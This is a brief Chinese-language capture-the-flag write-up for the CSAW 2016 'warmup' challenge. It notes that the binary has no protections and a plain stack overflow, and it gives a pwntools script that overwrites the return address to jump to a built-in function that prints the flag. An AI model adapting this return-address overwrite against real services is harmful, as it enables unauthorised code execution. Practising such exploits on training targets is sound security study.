攻防世界 warmup wp (csaw-ctf-2016-qu
2019-08-02 本文已影响0人
111p1kk
额...攻防世界没有提供附件,我去网上找了找附件
checksec 什么保护都没有开ovo
ida 存在很明显的栈溢出
这个sub_40060D就是自带了cat flag的函数。。。
这怎么能算是进阶呢。。。
EXP如下
#!usr/bin/python
from pwn import *
io = remote("111.198.29.45", 33575)
# io = process("./warmup")
payload = "a" * 0x40 + "a" * 8 + p64(0x40060D)
io.sendline(payload)
io.interactive()